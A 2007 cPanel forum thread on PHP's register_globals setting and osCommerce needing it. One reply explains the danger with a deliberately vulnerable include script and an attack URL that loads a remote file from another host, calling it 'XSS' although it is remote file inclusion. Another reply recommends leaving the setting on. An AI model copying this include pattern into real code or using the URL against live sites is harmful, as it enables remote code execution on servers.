The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

register_globals on or off ??

Discussion in 'General Discussion' started by ctbhost, Nov 30, 2007.

  1. ctbhost

    ctbhost Well-Known Member

    Joined:
    May 31, 2002
    Messages:
    139
    Likes Received:
    0
    Trophy Points:
    16
    i have up untill now had register_globals = on, but am now changing it to off

    here's my question

    every post i see tells me that having register_globals = on is a major security issue, however osCommerce requires it to be on, does this mean that osCommerce is insecure or is having register globals = on not such a security issue.

    im confused:confused:
     
  2. cPanelDavidG

    cPanelDavidG Technical Product Specialist

    Joined:
    Nov 29, 2006
    Messages:
    11,279
    Likes Received:
    8
    Trophy Points:
    38
    Location:
    Houston, TX
    cPanel Access Level:
    Root Administrator
    Requiring register_globals is commonly accepted as being very poor programming practice among PHP coders. Enabling register_globals is a security risk from the perspective of the system administrators. In fact, some PHP apps now will refuse to function in an environment where register_globals is on due to the security risk.

    Generally the advice is that if a PHP application requires register_globals, you may want to consider another PHP application.

    Also, many PHP coders are beginning to prepare for PHP 6, where register_globals will no longer be available. If something is still requiring register_globals, it's a bit behind the times as far as PHP coding standards go.
     
  3. ctbhost

    ctbhost Well-Known Member

    Joined:
    May 31, 2002
    Messages:
    139
    Likes Received:
    0
    Trophy Points:
    16
    i would have thought osCommerce (being one of the most popular shopping carts) would have been pretty safe to use but maybe its not the best ??
     
  4. sparek-3

    sparek-3 Well-Known Member

    Joined:
    Aug 10, 2002
    Messages:
    1,384
    Likes Received:
    23
    Trophy Points:
    38
    cPanel Access Level:
    Root Administrator
    I recently wrote up an article concerning this.

    In regards to osCommerce, I just think their developers have fallen asleep. Is the project even being actively developed any more?

    I would really be afraid to use osCommerce, because if they are willing to ignore the issue such as register_globals, what other issues are they ignoring? Do you really feel safe knowing that your e-commerce website is handled by such a piece of software? What if a major, major vulnerability is found in osCommerce, are they going to sit on their hands for 10 years before releasing a fix?

    This isn't to say that having register_globals disabled will instantly bring you a ton of extra security. Its also not to say that by writing a script that requires register_globals to be enabled is a security flaw. But the common conception regarding register_globals is that it should be turned off. Script developers should be aware of this and should have already adjusted their scripts to function in this manner.
     
  5. twhiting9275

    twhiting9275 Well-Known Member

    Joined:
    Sep 26, 2002
    Messages:
    538
    Likes Received:
    15
    Trophy Points:
    18
    cPanel Access Level:
    Root Administrator
    Twitter:
    Here's my 0.02:
    globals themselves are not bad, as long as you secure them. The problem is that wanna be coders get in there and write crappy scripts cheaply , and decide 'hey, we're just not going to secure our globals at all'. This (of course) leads to hacking, problems, and just all around bad things.

    Now, should they be required on or off? Well, as of php6, you won't have a choice. Thank the gods that's not for a while, but still, it'll happen, eventually. Personally, I'm still getting ready for that day (I do use a few globals, properly secured, of course), but it'll be a bloody nightmare when everything gets there.

    Personally, I say leave 'em on ,for now. When PHP makes you turn 'em off, do so, but not until. Otherwise, this will cause some HUGE problems with pretty common software.
     
  6. cPanelDavidG

    cPanelDavidG Technical Product Specialist

    Joined:
    Nov 29, 2006
    Messages:
    11,279
    Likes Received:
    8
    Trophy Points:
    38
    Location:
    Houston, TX
    cPanel Access Level:
    Root Administrator
    Note that globals (global variables) is a completely different thing from register_globals. Anyone who is spending enough time to secure their PHP scripts will likely spend a few seconds to avoid the need for register_globals.

    If you're not familiar with global variables from a programming standpoint, here's a link to the Wikipedia article on it:

    http://en.wikipedia.org/wiki/Global_variable

    In PHP, register_globals allows any parameter passed to the script to be assigned to a global variable (including overwriting the values of existing global variables, hence the danger of this setting). Let's say you have this PHP script named exploit_me.php:

    PHP:
    // Warning: never code like this in a register_globals environment
    $include_file "myinclude.inc";

    // Note the lack of anything polling GET or POST variables explicitly.
    include($include_file);
    Now lets say you call this URL:

    Code:
    http://yourDomain.com/exploit_me.php?include_file=http://myDomain.com/xss.php
    
    My XSS script would then run on your server since you have register_globals enabled and I'm overwriting the include_file global variable with my own data.

    While this is an obvious example, don't expect the this to be as obvious in many scripts. How do people know what variables you are using? Well most scripts people use are open source so you can just look at the source.

    I hope this clears some misconceptions of register_globals vs. PHP global variables.
     
    #6 cPanelDavidG, Dec 3, 2007
    Last edited: Dec 3, 2007
  7. bibin

    bibin Member

    Joined:
    Sep 10, 2006
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
  8. FreedomBI

    FreedomBI Well-Known Member

    Joined:
    Jul 7, 2008
    Messages:
    65
    Likes Received:
    0
    Trophy Points:
    6
    A while back, I had the misfortune of having to set up oscommerce for customers, including trying to integrate add-ons. The code nearly made me scream in horror.

    I have heard good stuff about Zen Cart, which I believe is similar. I haven't looked at it in depth, though. You should probably take a look at it. And if you're a Drupal fan, there's the e-Commerce modules, as well as the Ubercart system.
     
Loading...

Share This Page